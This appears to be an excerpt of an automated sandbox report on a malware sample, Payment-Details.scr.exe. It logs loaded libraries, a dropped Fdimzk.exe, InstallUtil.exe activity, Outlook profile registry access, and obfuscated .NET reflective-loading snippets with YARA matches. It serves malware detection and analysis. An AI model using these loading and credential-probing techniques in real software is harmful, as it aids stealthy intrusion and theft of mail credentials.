                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\Fdimzk.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\Payment-Details.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Payment-Details.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payment-Details.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.0000000004409000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1676003919.00000000036C9000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1690104428.0000000006690000.00000004.08000000.00040000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2013699239.0000000002A0A000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000004.00000002.2041551021.0000000003797000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2100971081.0000000003179000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.000000000403D000.00000004.00000800.00020000.00000000.sdmp, Fdimzk.exe, 00000005.00000002.2124173104.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000048CD000.00000004.00000800.00020000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1693072920.00000000071D0000.00000004.08000000.00040000.00000000.sdmp, Payment-Details.scr.exe, 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, cEMTeSTJCQwtXJPNZNI.cs .Net Code: Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777259)),Type.GetTypeFromHandle(UoJbCPMsMYyxPcP56ut.tonp9NsT8A(16777263))})
                    Source: Payment-Details.scr.exe, Fdcbogjlxm.cs .Net Code: Klooqgfjmbl System.Reflection.Assembly.Load(byte[])
                    Source: Fdimzk.exe.0.dr, Fdcbogjlxm.cs .Net Code: Klooqgfjmbl System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Payment-Details.scr.exe.48cdf10.6.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Payment-Details.scr.exe.71d0000.12.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.Payment-Details.scr.exe.4409570.7.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: Yara match File source: 0.2.Payment-Details.scr.exe.7160000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payment-Details.scr.exe.47efcb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payment-Details.scr.exe.4621310.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Payment-Details.scr.exe.4513690.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.1692829091.0000000007160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1676003919.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2100971081.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000004.00000002.2013699239.000000000273C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1685635994.00000000044FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
